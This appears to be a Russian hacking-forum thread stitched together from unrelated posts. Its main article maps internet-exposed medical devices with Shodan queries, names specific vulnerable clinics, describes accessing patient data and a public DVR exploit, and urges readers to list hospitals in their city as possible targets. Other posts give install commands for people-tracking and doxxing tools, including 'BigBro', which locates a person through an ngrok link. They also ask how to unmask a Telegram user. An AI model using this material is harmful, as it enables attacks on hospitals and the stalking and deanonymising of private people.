медицинских записи, и использовать для шпионажа или шантажа.
Шифровальщик Purgen вывел из строя медицинское оборудование во время операции на мозге 13-летней девочки / <https://threatpost.ru/tyumen-medical-center- under-purgen-attack/27085/>
Иногда для получения конфиденциальных данных даже не нужно использовать какие- либо уязвимости. К примеру, из-за отсутствия базовых знаний по информационной безопасности у людей, ответственных за настройку оборудования, некоторые системы, подключенные к сети, доступны без аутентификации.
Примером этого могут служить два сервера радиологии в Австралии. С одной стороны, Австралия боится китайских методов шпионажа, вроде Cloud Hopper, но с другой стороны они оставляют два незащищенных сервера Cynetics. Это веб-системы медицинских изображений, предназначенные для ведения клинической отчетности мед. персоналом.
Австралийский центр кибербезопасности был проинформирован об этом, и соответствующие меры были приняты. Однако, так как данные были доступны всем желающим в течение месяца, они не остались незамеченными.
Утечка вышеназванных серверов содержала 4,5 ТБ данных, включая рентгенологические фотографии беременностей с диагнозом (почти 2 миллиона изображений!), счета-фактуры и личные данные пациентов.
Стоит отметить, что, заходя на эти сервера, пользователи имели привилегии
администратора. Это значит, что посетители могли просматривать абсолютно всю
информацию и даже удалять платежи пациентов, вместе с клиническими
результатами.
Таким образом, можно нанести огромный ущерб учреждению, подделывая данные
клиентов или удаляя платежи. Или можно копнуть глубже и поискать уязвимости
уже в самой веб-консоли Cynetics.
Самые ранние сведения о платежах и должниках датируются 2009 годом, фотографии
Возвращаясь к основной теме и наиболее важным данным в утечке, каждый пациент имеет от 10 до 40 рентгенологических фотографий с описанием.
Честно говоря, мне эти данные ни о чем не говорят, кроме того, что это какая - то информация о плоде. Но для тех, кто разбирается в медицине, это наверняка должно быть интересно.
Проведя беглую разведку, я выделил две клиники, в которых отсутствуют надлежащие меры безопасности.
Первая - Tara Imaging for Women
![goo.gl](/proxy.php?image=https%3A%2F%2Fstreetviewpixels- pa.googleapis.com%2Fv1%2Fthumbnail%3Fpanoid%3DG8kzmgudUKoxiq92ptPECg%26cb_client%3Dsearch.gws- prod.gps%26w%3D900%26h%3D900%26yaw%3D157.86351%26pitch%3D0%26thumbfov%3D100&hash=d3d3528f2c001fa1cb5ccf9edb881e63&return_error=1)
](https://goo.gl/maps/X6jjFk7V3cR2JpLs9)
Building
goo.gl
Чтобы подтвердить предположение, что админ-панель принадлежит именно этой клинике, я скачал один счет:
Название второго объекта было также найдено в самой админ-панели: Western Imaging Group, расположенная на Campbell Street.
![goo.gl](/proxy.php?image=https%3A%2F%2Fstreetviewpixels- pa.googleapis.com%2Fv1%2Fthumbnail%3Fpanoid%3DGVrqsmXo45XPsWLr2r0XMA%26cb_client%3Dsearch.gws- prod.gps%26w%3D900%26h%3D900%26yaw%3D119.84617%26pitch%3D0%26thumbfov%3D100&hash=0978c785ccd49eecac6cbacf07e9c4bd&return_error=1)
](https://goo.gl/maps/NdAoaEwsjVWfsoaG7)
Building
goo.gl
Как компенсировать знания в медицине OSINT 'ом
Из-за отсутствия должных медицинских знаний, это было одно из самых сложных
для меня исследований, которое я когда-либо проводил. Я не врач и никогда не
интересовался медицинскими клиниками или больницами. В процессе исследования,
я многое узнал о медицинском оборудовании и о том, как больницы связаны между
собой, как работает мед. персонал и многое другое.
Для того, чтобы получить соответствующие знания, я разделил исследование на три части:
Поиск используемого оборудования и протоколов
Я начал с поиска документов, в которых бы было упомянуто оборудование,
использовавшееся в поликлиниках. Оно было нужно мне для того, чтобы далее я
мог сформировать более-менее внятные запросы в Shodan. Но все, что я находил -
бесполезные модные презентации, в которых люди отражали статистику
организаций, в которых они работают. Это, конечно, полезно, но не для меня.
В итоге, после долгого времени поисков, меня порадовал только один найденный документ. Этот документ был написан Кристодулосом Циампазисом из University of Twente и носит название - «Exposure Assessment on Medical Devices in the Netherland». На странице [Github ](https://github.com/ChristodoulosTziampazis/Exposure-Assessment-on-Medical- Devices-in-the-Netherlands/issues)он поделился списком ключевых слов для поиска в Shodan, поставщиками оборудования и софтом, используемом в мед. учреждениях и многим другим.
Это отличная исследовательская работа, с полной версией которой можно
ознакомиться по ссылке -
https://essay.utwente.nl/78845/1/Tziampazis_BA_EEMCS.pdf
В процессе поиска материалов, я использовал понятия, вроде «Радиология»,
«Онкология», «Офтальмология», «Оториноларингология», «Неврология»,
«Ветеринария» и т.д.
DICOM и как он используется в медицине
DICOM (Digital Imaging and Communications in Medicine) - медицинский отраслевой стандарт создания, хранения, передачи и визуализации цифровых медицинских изображений и документов обследованных пациентов, являющийся наиболее популярным в зарубежных клиниках. Если вы хотите узнать о последствиях его появления в сети, рекомендую прочитать отчет от Greenbone.
Конфиденциальные данные пациентов, свободно доступные в Интернете (PDF) - https://www.greenbone.net/wp-content/uploads/CyberResilienceReport_EN.pdf
Я начал искать устройства, использующие DICOM, для сканирования их на наличие других открытых портов и просмотра работающих служб. Оказывается, все настолько плохо, что в большинстве случаев были открыты дополнительные порты, включая 3389 (RDP), 80 (HTTP), 8080 (HTTP) и другие, полезные для дальнейших исследований.
Помимо этого, для поиска мед. клиник, мед. университетов и лабораторий, я начал составлять простенькие запросы в Shodan, например: «org: hospital», «org: medical» и различных их вариации, включая различные языки. Например, на голландском языке это «org: Ziekenhuis» или на немецком - «org: Krankenhaus». Такой подход позволил провести обширную разведку, чтобы собрать как можно больше устройств, подключенных к сети, в медицинских организациях.
Охота на вендоров
Последняя часть поисков состояла из сбора всевозможных поставщиков и производителей медицинских устройств.
Мне очень помог сайт https://www.medicalexpo.com/, на котором я перебрал всех продавцов и каждую модель их устройств, после чего перешел к шодану. Зная, что некоторые панели входа в систему устройств имеют нижний колонтитул типа «Powered by <нужная мне компания_нейм>», я смог найти еще много устройств и проверить, какие дополнительные сервисы работают на машинах.
Помимо этого, я случайно обнаружил промышленные системы управления, но об этом в другой раз.
Таким образом, я представляю вам около 90 запросов для поиска различных медицинских устройств в Shodan - от микроскопов и дефибрилляторов до мониторов астмы. C полным список можно ознакомиться [тут](https://github.com/woj- ciech/Kamerka-GUI#full-list-of-supported-devices-with-corresponding-queries).
Геолокация устройств
Некоторые устройства не имеют какого - либо потенциального индикатора для
определения их точного местоположения. Разберем несколько кейсов.
Кейс #1: Grover C. Dils Medical Center, Caliente, Nevada, United States
RIS/PACS, основанные на веб-технологиях Medweb, предлагает решения для
управления документооборотом и планированием бюджета.
Запрос: html:"DBA Medweb. All rights reserved."
Название объекта отображается в заголовке и содержании HTML.
Стоит отметить, что SSL-сертификат выдан Medweb.
Геолокация довольно проста - местоположение на основе IP указывает на ближайший город и при помощи Xamerka мы можем проложить маршрут до медицинского центра.
Кейс #2: IRM CHARENTON ST MAURICE, 22 rue Victor HUGO 94220, CHARENTON LE
PONT
Medecon Clipper - это веб-сервер, предназначенный для управления отчетами для
врачей общей практики.
Запрос: http.favicon.hash:-897903496
Некоторые устройства и софт используются только в определенных странах (например, DLP-система Infowatch, в основном, только в России). Medecom (http://www.medecom.fr/) - французская компания, большая часть которой расположена во Франции.
Точное местоположение можно увидеть в HTML, при входе.
IP-адрес указывает на Montmorency, но фактически, клиника находится в пригороде Парижа.
В дополнении стоит сказать, что владельцы давно не обновляли версию ПО. У них стоит Medecon Clipper версии 4.4, хотя последняя, на момент написания статьи,
Кейс #3: Maternity Sainte-Elisabeth — Chu Uclouvain Namur, Place Louise
Godin 15, 5000 Namur, Belgium
Brainlab развивает здравоохранение при помощи программных технологий. Для
улучшения условий проведения операций, радиохирургических процедур и многого
другого, они создают программные и аппаратные решения.
Запрос: title:"Brainlab Origin Server"
Telemis
Telemis - быстроразвивающаяся компания, работающая в области медицинского
оборудования и специализирующаяся на решениях PACS.
Запрос: http.favicon.hash:220883165
Это кейс - пример того, как другие службы, работающие на машине, помогают найти дополнительные цели. Первоначально я искал хосты Brainlab, но на том же сервере работал веб-интерфейс Telemis.
Авторизация проходит на montgodinne.ad. Этот домен принадлежит клинике Mont- Godinne.
Telemis работает на той же машине, но на отдельном порту. Тем не менее, он
подтверждает предположение о клинике, выводя название "CHU UCL Namur".
Теперь мы имеем полное название и её местоположение - CHU UCL Namur - Site Godinne. IP указывает на Waterloo, но расположение больницы отличается, примерно на 80 км.
Кейс #4: Leiden University Medical Center (LUMC), Albinusdreef 2, 2333 ZA
Leiden, The Netherlands
BrainScope - это медицинская компания, специализирующаяся на медицинской
нейротехнике, которая используется для проверки у человека черепно-мозговой
травмы. Инновационная система BrainScope One представляет собой простую в
использовании платформу, которая позволяет врачам быстро проводить точные
оценки травм головы прямо на месте оказания медицинской помощи.
https://brainscope.com/
Запрос: title:BrainScope
Эта машина находится в сети «Leiden University Medical Centre».
Которая очень близка к местоположению, полученному из базы данных геолокации, которую использует Shodan.
Бонус
Почему больницы становятся жертвами вымогателей?
Скриншоты взяты из Shodan.
Таким образом, вы видите уже, как минимум, один вектор атаки для получения необходимой информации о пациентах, персонале или инфраструктуре больницы, лежащий на поверхности.
Брутфорс, Credential Stuffing или фишинг - это типичная точки входа для злоумышленника, для того, чтобы начать заражение или украсть медицинские данные. Кроме того, система безопасности уязвима не только для уязвимостей нулевого дня, но и для уже известных эксплойтов.
Попробуйте составить список больниц или медицинских клиник в вашем городе, которые могут стать следующей целью атак злоумышленников из-за отсутствия основных мер безопасности. Уверен, таковых найдется не мало.
Другие интересные находки
Мне пришлось исключить пару устройств из-за их относительной малочисленности
или сложности выделить какой - то общий идентификатор для формирования
подходящих запросов в Shodan.
Wall of Analytics
Это решение от General Electric, которое работает как командный центр для
обработки данных в реальном времени, в больнице, с использованием ИИ.
Микроскопы
Я не вижу смысла подключать микроскопы к интернету, но, как вы видите, и такое
тоже случается.
При помощи веб-консоли можно калибровать микроскоп и записывать видео.
Система обмена сообщениями для медсестры
Есть платформы, о которых я даже не подозревал. Одной из таких является служба
обмена сообщениями для медсестер. Опять же, на мой взгляд, подключение к
интернету для такой системы ни к чему.
Это решение позволяет контролировать каждую комнату, просматривать температуру
и отслеживать вызовы.
Health of Future
Еще один продукт от General Electric Healthcare - Health of Future
Perioperative. Он используется для управления операционными залами. О нем
достаточно сложно найти какую - либо информацию, я даже не смог определить
актуальную версию или дефолтные пароли.
Orthanc Explorer
Это еще одна программа для просмотра DICOM. Она позволяет просматривать
рентгеновские снимки пациентов, а также другую медицинскую информацию. Многие
устройства Orthanc доступны без аутентификации.
Это все весело до тех пор, пока специалисты не начнут искать в таких продуктах
уязвимости.
У них, кстати, есть демка, которую можно оценить по ссылке -
https://demo.orthanc-server.com/app/explorer.html
Раскрытие информации
GlucoCare Glycemic Control System
Программное обеспечение для расчета дозы инсулина, разработанное и продаваемое
Pronia Medical Systems.
На странице входа можно увидеть сервер-кей и информацию о лицензии.
KbPort
Независимо от того, строите ли вы новый центр симуляции или расширяете
существующий, вам на помощь придет KbPort Simplicity™.
Это комплексное решение, которое поможет вам спроектировать идеальную среду
для любого предприятия.
Внутренняя инфраструктура доступна на страницу входа.
Промышленные системы управления
На третьем этапе исследований (в процессе поиска вендоров), я обнаружил не
только медицинские приборы, но и промышленные системы управления. Некоторые
производители не только оснащают больницы, но и производят и поддерживают
различные отрасли промышленности.
Одним из примеров такого типа компаний является Bosch. С одной стороны, она
предоставляет мониторы артериального давления и капсульные контрольные весы
для здравоохранения. С другой стороны, Bosch производит системы безопасности и
многие другие продукты IoT и ICS, которые широко используются во всем мире.
Пытаясь найти медицинские устройства, я наткнулся на Bosch Security Systems
DVR 630/650/670 Series с запросом: http.html: «Bosch Security».
https://www.exploit-db.com/exploits/34956
Около 600 таких устройств оказались доступны в интернете. В исходном коде HTML я нашел несколько CGI-путей, которыми можно злоупотребить. Большое спасибо @ChristiaanBeek, который подтвердил наличие уязвимости и нашел эксплойт для этих устройств. Он находится в публичном доступе с 2014 года и с его помощью можно получить полный доступ над устройством.
Как вы видите, мы без труда можем получить данные для входа в панель.
Заключение
Индустрия здравоохранения является одной из наиболее уязвимых отраслей, и, от
того, требующая повышенной безопасности. Речь идет не только о личной
информации, как в других отраслях, но и о жизнях людей, которые подвергаются
опасности в случае кибератак или несанкционированного доступа к больничным
системам. Многие устройства открыты для доступа извне, что повышает шансы на
их компрометацию. Существует множество уязвимостей, которые не закрывают
годами. Злоумышленники без труда могут получить доступ через открытый RDP и
расширить свои привилегии для всей сети. Вот почему так важно проводить
тестирования на проникновения в медицинских клиниках и больницах.
(с) Статья написана для каналов @cybred и @in51d3
Обычно пользователи регистрируются на сайтах и в социальных сетях с одним и тем же ником (логином). Поэтому если возникает вопрос, как найти все профили пользователя, то нужно поискать на сайтах по известному его нику. Делать это вручную долго, но нам поможет программа Sherlock.
Sherlock — это программа на Python, которая на множестве сайтов социальных сетей проверяет, зарегистрирован ли там пользователь с указанным именем, то есть имеется ли учётная запись с таким именем пользователя (ником).
В настоящее время поддерживаются около 300 сайтов, полный список здесь: https://github.com/sherlock-project/sherlock/blob/master/sites.md
Хорошие новости для пользователей Windows — Sherlock можно запустить на любой операционной системе. А для самого быстрого доступа к инструменту сделан онлайн сервис Sherlock.
Как установить Sherlock в Kali Linux
Установка в Kali Linux очень простая, достаточно выполнить команду:
Code:Copy to clipboard
sudo apt install sherlock
Запускать так:
Code:Copy to clipboard
sherlock ИМЯ_ПОЛЬЗОВАТЕЛЯ
Как установить Sherlock в Linux Mint, Ubuntu, Debian и их производные
Для установки выполните следующие команды:
Code:Copy to clipboard
sudo apt install python3-pip git python3-setuptools
git clone https://github.com/sherlock-project/sherlock
cd sherlock/
sudo pip3 install -r requirements.txt
python3 ./sherlock.py -h
Запускать так:
Code:Copy to clipboard
python3 ./sherlock.py ИМЯ_ПОЛЬЗОВАТЕЛЯ
Как установить Sherlock в Windows
1. Вначале установите Python и PIP на Windows.
Поищем пакет sherlock в репозиториях PIP:
Code:Copy to clipboard
pip search sherlock
Самое близкой из найденного:
Code:Copy to clipboard
thesherlock (0.2.6) - Sherlock the username detective
Описание переводится как «детектив имён пользователей Шерлок».
Возможно это тот самый интересующий нас инструмент, но его версия 0.2.6, в то время как последней версией на момент написания является 0.10.4.
Если вы хотите пойти самым простым путём, то можно установить так:
Code:Copy to clipboard
pip install thesherlock
Но я рекомендую другой вариант, благодаря которому мы получим самую последнюю версию Sherlock.
2. Скачиваем архив с программой: <https://github.com/sherlock- project/sherlock/archive/master.zip>
3. Распаковываем архив и запоминаем папку, например, у меня это **C:\Users\MiAl\Downloads\sherlock-master**.
4. Теперь открываем командную строку: Win+x → Windows PowerShell.
5. В командной строке переходим в папку со скриптами используя команду cd :
Code:Copy to clipboard
cd C:\Users\MiAl\Downloads\sherlock-master\
6. Установим зависимости:
Code:Copy to clipboard
pip install -r requirements.txt
7. Проверим, всё ли в порядке, для этого выведем сообщение справки:
Code:Copy to clipboard
python ./sherlock.py -h
8. Запускать так:
Code:Copy to clipboard
python ./sherlock.py ИМЯ_ПОЛЬЗОВАТЕЛЯ
Как найти аккаунты в социальных сетях
Выше уже показаны особенности запуска в зависимости от операционной системы. Я покажу работу программы на примере Windows.
К примеру, я хочу найти все профили с именем пользователя miloserdov :
Code:Copy to clipboard
python ./sherlock.py miloserdov
Если аккаунт найден, то будет показано имя сайта и ссылка на профиль:
Code:Copy to clipboard
[+] Ebay: https://www.ebay.com/usr/miloserdov
[+] Facebook: https://www.facebook.com/miloserdov
Надпись «Not Found! » означает, что не удалось найти пользователя с таким именем на этом сайте:
Code:Copy to clipboard
[-] Dribbble: Not Found!
[-] Ello: Not Found!
[-] Etsy: Not Found!
[-] EyeEm: Not Found!
[-] F3.cool: Not Found!
Как в Sherlock показать ссылки только на существующие профили
Выводится много информации (проверка выполняется по почти 300 сайтам), было бы неплохо сделать её более читаемый хотя бы за счёт удаления записей о ненайденных профилях. Это легко делается с помощи опции --print-found :
Code:Copy to clipboard
python ./sherlock.py --print-found ИМЯ_ПОЛЬЗОВАТЕЛЯ
Согласитесь, стало намного лучше:
Как искать сразу несколько имён пользователей в социальных сетях
Если вы знаете альтернативные имена одного пользователя или хотите выполнить поиск сразу нескольких пользователей, то просто укажите их через пробел:
Code:Copy to clipboard
python ./sherlock.py --print-found ИМЯ_ПОЛЬЗОВАТЕЛЯ1 ИМЯ_ПОЛЬЗОВАТЕЛЯ2 ИМЯ_ПОЛЬЗОВАТЕЛЯ3
Например:
Code:Copy to clipboard
python ./sherlock.py --print-found miloserdov mi-al mial
Как в Sherlock проверять только по некоторым сайтам
Вполне возможно, что вам нужно проверить только по одному или нескольким сайтам и вам не хочется дожидаться полной проверки по всем социальным сетям. В этом случае используйте опцию --site , после которой укажите имя сайта. Имена сайтов показываются в выводе программы во время проверки, также вы сможете их найти в файле data.json. Опцию --site можно использовать несколько раз, то есть можно запустить проверку одновременно по нескольким сайтам, пример команды:
Code:Copy to clipboard
python ./sherlock.py --print-found --site Facebook --site VK --site Badoo --site datingRU --site YouTube --site Telegram --site Twitch --site Twitter miloserdov mi-al mial
Как в Sherlock сохранить результаты в файл
По умолчанию для каждого имени пользователя в папке программы создаётся файл вида ИМЯ_ПОЛЬЗОВАТЕЛЯ.txt. При желании вы можете создать файл CSV, который можно открыть офисными программами для работы с таблицами. В этом файле значения будут разделены запятыми (можно использовать для обработки скриптами или импорта в базы данных. Для создания файла CSV укажите опцию --csv.
По умолчанию эти файлы создаются прямо в директории Sherlock, если вы хотите указать другую директорию, то используйте опцию -fo ПАПКА :
Code:Copy to clipboard
python ./sherlock.py --print-found -fo results miloserdov
Вместо файла вида ИМЯ_ПОЛЬЗОВАТЕЛЯ.txt вы можете указать любое другое имя, для этого используйте опцию -o. Помните, что эта опция применима только если проверяется одно имя пользователя.
Сортировка сайтов по популярности в Sherlock
Если вы хотите, чтобы первыми шли самые популярные сайты, то укажите флаг -r. Популярность сайтов определяется на основе глобального рейтинга Alexa.com.
Как делать проверки в Sherlock через прокси
Sherlock поддерживает отправку запросов через прокси. Для этого используйте опцию --proxy PROXY_URL (короткий вариант написания имени опции -p PROXY_URL). Пример формата прокси: socks5://127.0.0.1:1080
Если хотите брать прокси из списка, то используйте опцию --proxy_list СПИСОК_ПРОКСИ (короткий вариант написания имени опции -pl СПИСОК_ПРОКСИ). Прокси будут выбираться случайным образом из этого списка.
Файл, указываемый с опцией --proxy_list , должен быть в формате .csv. В нём прокси должны описываться полями : 'ip', 'port', 'protocol'.
Вместе с опцией --proxy_list вы можете указать опцию --check_proxies ЧИСЛО (-cp ЧИСЛО). В этом случае будет выполнена проверка на работоспособность и анонимности прокси из файла .csv .Укажите 0 для снятия ограничений на количество прошедших проверку прокси, или укажите другое число для установления лимита.
Как пользоваться Sherlock через Tor
Поскольку Sherlock умеет работать с SOCKS5, то после установки и запуска службы Tor на любой операционной системе, используйте опцию --proxy со значением socks5://localhost:9050 :
Code:Copy to clipboard
python ./sherlock.py --proxy socks5://localhost:9050 ИМЯ_ПОЛЬЗОВАТЕЛЯ
Автор @ Alexey
hackware.ru
разброса местоположения 1-10 метров, зависит от расположение человека.
git clone https://github.com/Bafomet666/Bigbro
Далее вам нужно распоковать нужную версию.
cd /Big bro 5.0
chmod 777 install.sh
./install.sh
sudo python3 bigbro.py -t manual -k start.kml
git clone https://github.com/Bafomet666/Bigbro
Далее вам нужно распоковать нужную версию.
cd /Big bro 5.0
chmod 777 termux_install.sh
./install.sh
python bigbro.py -t manual -k start.kml
Специально для termux, если вы не можете установить ngrok нормально, вот вам быстрая установка без заморочек. https://github.com/Bafomet666/Fast-ngrok
Скачайте и установите ngrok [ https://ngrok.com/download ]
Далее запустите ngrok в сторонем окне командой sudo ngrok http 8080
Kali linux / Parrot os: sudo python3 bigbro.py -t manual -k start.kml
Termux: python bigbro.py -t manual -k start.kml
Это мой первый продукт в виде эксплойта, для хакеров и социальных инженеров. Честно я доволен проделанной работой, я узнал много нового для себя в разработке, такого типа эксплойтов. Если ты хочешь повлиять на создание нового эксплойта, или закинуть мне идей по поводу новых эксплойтов. Напиши мне в Telegram https://t.me/satana666mx.
Доброго времени суток форумчане, подскажите как можно узнать максимум информации по нику телеги, в каких группах состоит и кто за ним стоит. Пример такой, есть организация, у нее есть менеджеры обрабатывающие заказы, я ищу человека стоящим во главе этой конторы. И еще вопрос, как можно попасть в закрытую группу, возможно ли хотя-бы просматривать там сообщения?
OSIF - это точный сбор информации учетной записи facebook, вся
конфиденциальная информация может быть легко собрана, даже если цель
конвертирует всю свою конфиденциальность в (только я) конфиденциальную
информацию о месте жительства, дате рождения, роде занятий, номере телефона и
адресе электронной почты.
Ставим
Code:Copy to clipboard
pkg update upgrade
pkg install git python2
git clone https://github.com/ciku370/OSIF
cd OSIF
pip2 install -r requirements.txt
Использование:
Code:Copy to clipboard
python2 osif.py
Скриншот:
На гите
](https://github.com/ciku370/OSIF)
Open Source Information Facebook. Contribute to CiKu370/OSIF development by creating an account on GitHub.
github.com
Разведка сетевых ресурсов компании главным образом заключается в брутфорсе поддоменов с последующим ресолвом найденных сетевых блоков. Далее могут быть найдены новые домены 2 уровня и процедура повторяется снова. Это позволяет найти новые IP-адреса на каждой итерации.
Этот метод, пожалуй, самый эффективный. Однако встречались такие ситуации, когда целая подсеть /24 оставалась не найденной.
В наши дни появилось еще одно мощное средство — passive dns, которое позволяет сделать то же самое что и классический DNS-ресолв, но используя специальный API. Это может быть, к примеру, «virustotal» или «passive-total». Эти сервисы записывают DNS запросы и ответы, которые собираются с популярных DNS-серверов. Преимущество этого подхода в том, что нам не нужен брутфорс. Мы просто указываем IP-адрес и получаем все известные DNS записи. Или, наоборот, указывая DNS мы получаем все IP-адреса, которые ассоциированы с данным именем. У данного подхода есть неоспоримое преимущество — мы можем найти старые сервера сайтов, которые ресолвились раньше. Ведь в конце концов старые сайты наиболее вероятно будут содержать уязвимости.
Несмотря на описанные выше техники существует еще несколько чуть менее популярных, но всё же дающих результаты. В данной статье мы рассмотрим ещё две методики разведки — поиск IP-адресов по географическим данным (geo2ip) и нахождение IP-адресов по имени компании (reverse-whois).
Что такое geoip, думаю, знают многие из нас. Он используется достаточно часто как разработчиками, так и администраторами. Однако geoip используется главным образом в направлении ip → geo. В нашем же случае это не так интересно. Забавно, но перед тем, как разработать собственное решение, не было найдено ни одной библиотеки, позволяющей делать запросы в обратном направлении geo → ip. Поэтому было решено написать собственный инструмент, более того что реализуется это не так уж и сложно.
Инструмент был написан достаточно давно, так что использован python2.
Данный пакет содержит два инструмента:
geoip
— выполнение различных запросов ip → geo, city → ip, country → ip, lat:long → ip и т.п.;rwhois
— выполнение различных запросов к whois базе (об этом во второй части статьи).Итак, сперва нужно скачать geoip-базу:
К сожалению, начиная с 2020 года, база geoip больше не обновляется для публичного использования. Точнее, обновляется, но они закрыли скачивание за авторизацией (оттуда еще можно взять лиц-ключ для скачивания/обновления в скрипте). Так что пришлось захардкодить ссылку на последний публичный снапшот.
Инструмент geoip имеет удобный синтаксис, который позволяет выполнять гибкие запросы к базе. Все запросы указываются через ключи, а то, что требуется вывести, в аргументах. Мы так же можем использовать подстановку с помощью символа «%» (SQL-синтаксис).
Например, для поиска информации по городу и диапазону IP-адресов, с выводом результата о блоках адресов, странах и городах:
Поиск сетей по CIDR и городу
Инструмент geoip имеет встроенную визуализацию, например, можно посмотреть расположение сетей какой-либо страны на карте:
Получение всех сетей какой-либо страны
Просмотр расположения сетей на карте
Для поиска сетей мы так же можем указать произвольный регион (регионы) в виде круга или квадрата с указанием радиуса в км. Например:
Поиск всех сетей по географическим координатам
Визуализация с использованием Google Earth
При работе с инструментом мы так же можем использовать пайпы для взаимодействия со сторонними утилитами.
Посмотрим geoip-информацию о результатах выборки из shodan:
Использование geoip вместе с shodan
Ниже еще несколько примеров, не связанных напрямую с разведкой.
Распарсив логи apache, посмотрим, какие страны посещали сайт:
Анализ логов Apache с geoip
Или из каких городов был ресолв собственной dns-зоны:
Анализ bind-логов с помощью geoip
Вернемся к разведке. Сканирование целого города – найдем все незащищенные mongo сервера в некотором городе:
Сканирование какого-либо города с помощью geoip
Или даже сканирование целой страны – найдем незащищенные memcached сервера в некоторой стране:
Сканирование всей страны с помощью geoip
Whois это протокол прикладного уровня, работающий на 43/tcp порту. Его главная цель – получение информации о блоках IP-адресов. Эта информация запрашивается с серверов регистраторов. Всего существует 5 регистраторов, расположенных на 5 соответствующих континентах:
Доступ к whois производится с помощью одноименного инструмента:
Code:Copy to clipboard
whois 8.8.8.8
Или вручную, через telnet:
Code:Copy to clipboard
telnet whois.ripe.net 43
1.2.3.4
Тут мы снова опираемся главным образом на IP-адреса. Однако все же мы можем искать информацию по некоторым полям:
Code:Copy to clipboard
whois -h whois.ripe.net -T person admin@somecompany.com
или
Code:Copy to clipboard
whois -h whois.ripe.net -- '-i mnt-by RIPE-NCC-MNT'
Например, для RIPE возможно искать по следующим полям:
К сожалению, мы не можем искать по самым интересным полям - «netname» и «descr», которые содержат название сети. Так же при таком поиске требуется полное совпадение. Иными словами, мы не можем искать с подстановкой «-T person *@somecompany.com».
Существует несколько web-сервисов, предоставляющих более гибкий поиск, например https://apps.db.ripe.net/db-web-ui/#/fulltextsearch. Это позволяет использовать полнотекстовый поиск к RIPE базе.
Ещё существуют ежедневные дампы whois-баз всех регистраторов:
RIPE: ftp://ftp.ripe.net/ripe/dbase/ripe.db.gz
APNIC: https://ftp.apnic.net/apnic/whois/apnic.db.inetnum.gz
AFRINIC: https://ftp.afrinic.net/dbase/afrinic.db.gz
LACNIC: https://ftp.lacnic.net/lacnic/dbase/lacnic.db.gz
ARIN: https://ftp.arin.net/pub/rr/arin.db.gz
Это текстовые файлы, а значит мы можем применить к ним всю мощь grep:
Code:Copy to clipboard
grep netname: *company* ripe.db
Однако размер базы ripe.db (Европа) более чем 5 GB. Это делает поиск по этому файлу не таким быстрым как хотелось бы. Более того, если я хочу найти все имена сетей по CIDR (например, 77.77.0.0/16), то grep тут уже не поможет.
И тут в игру вступает второй инструмент – rwhois, который работает с данными файлами и имеет идентичный синтаксис как у geoip.
Аналогично, сперва нужно обновить базы:
Обновление whois-баз
Обновление информации по всем 5 континентам может занять длительное время. После можем посмотреть сколько IP-адресов в наших базах:
Количество IP-адресов по базам регистраторов
Можно так же обновить информацию только по указанному континенту:
Обновление whois-базы только для Европы
Попробуем найти что-нибудь. Найдем IP-адреса по имени сети:
Поиск блоков IP-адресов по имени сети
Так же не забываем искать по полю «descr»:
Поиск IP-адресов по полю описания сети и одновременно по стране
Или посмотрим, какие имена сетей есть в отдельно взятой стране:
Сети в отдельно взятой стране
Мы можем искать и по CIDR-диапазону:
Поиск сетей по CIDR
Наконец мы можем использовать geoip и rwhois вместе через пайп.
Попробуем найти все сети в некотором географическом регионе, где имена сетей содержат «telecom»:
Поиск telecom-сетей в некотором географическом сегменте
И последний пример — показать на карте, где находятся сети с определенным именем:
Поиск сетей на карте по имени
Просмотр сетей, найденных по имени на карте
Мы использовали ещё два инструмента, которые можно добавить к RECON арсеналу. Эти инструменты так же могут быть полезны и в других областях, не связанных с разведкой - для анализа и визуализации логов, дампов трафика и т. д.
Автор: Специалист Уральского центра систем безопасности
какие есть инструменты для инстаграма? может быть боты? можно и платный..
1: Gmail account finder
This tool lets you find anyone with a Gmail account.
You can see their location by tracking their reviews on Google.
You can see their picture if they have any on their Google account
2: Finding accounts with an email address:
Just enter the email and it will show you which websites they have an account or accounts on.
3: Finding info with phone number
This tool lets you find accounts on Telegram and other sites.
Just enter the phone number and check
4: Find an account on LinkedIn
If you have the email address of someone you want to find on LinkedIn just enter the email and it will show you all the information from LinkedIn.
Open Source Intelligence (OSINT) Collection and Analysis
It is time to look at OSINT in a different way. For many years, and within the previous editions of this book, we have relied on external resources to supply our search tools, virtual environments, and investigation techniques. We have seen this protocol fail us when services shut down, websites disappear, and custom resources are dismantled due to outside pressures. This book aims to correct our dilemma. We will take control of our investigative resources and become self-reliant. There will be no more need for online search tools; we will make and host our own locally. We will no longer seek pre-built virtual machines; we will create and configure our own. The new OSINT professional must be self-sustaining and possess their own tools and resources. You will become a more proficient subject matter expert who will be armed with the knowledge and readiness to articulate the sources of your findings.
This new eighth edition contains hundreds of pages which have been updated to keep your OSINT investigative methods fresh. It includes new online and offline search tools; a new Linux OSINT virtual machine; and tutorials to replicate all Linux OSINT tools within Mac and Windows operating systems. Brand-new search methods for Facebook, Instagram, LinkedIn, YouTube, and others ensure you have the latest techniques within your online investigation arsenal. An entire section is devoted to Methodology, Workflow, Documentation, and Ethics which provides a clear game plan for your next active investigation. All digital files are included via download. Today, we start over.
Contents
Introduction
SECTION I: OSINT Preparation
CHAPTER 01: Computer Optimization
CHAPTER 02: Linux Virtual Machine
CHAPTER 03: Web Browsers
CHAPTER 04: Linux Applications
CHAPTER 05: VM Maintenance & Preservation
CHAPTER 06: Mac & Windows Hosts
CHAPTER 07: Android Emulation
CHAPTER 08: Custom Search Tools
SECTION II: OSINT Resources and Techniques
CHAPTER 09: Search Engines
CHAPTER 10: Social Networks: Facebook
CHAPTER 11: Social Networks: Twitter
CHAPTER 12: Social Networks: Instagram
CHAPTER 13: Social Networks: General
CHAPTER 14: Online Communities
CHAPTER 15: Email Addresses
CHAPTER 16: Usernames
CHAPTER 17: People Search Engines
CHAPTER 18: Telephone Numbers
CHAPTER 19: Online Maps
CHAPTER 20: Documents
CHAPTER 21: Images
CHAPTER 22: Videos
CHAPTER 23: Domain Names
CHAPTER 24: IP Addresses
CHAPTER 25: Government & Business Records
CHAPTER 26: Virtual Currencies
CHAPTER 27: Advanced Linux Tools
CHAPTER 28: Data Breaches & Leaks
SECTION III: OSINT Methodology
CHAPTER 29: Methodology & Workflow
CHAPTER 30: Documentation
CHAPTER 31: Policy & Ethics
Conclusion
Добрый день!
Вот что у меня есть.
Бот @TgScanRobot позволяет посмотрет в каких группах состоит человек.
Просто напишите боту username человека или его числовой телеграм ID.
Бот бесплатный, показывает до 20 групп (остальные скрыты).
На данный момент в базе бота 404 тысячи чатов, 69 миллионов уникальных пользователей.
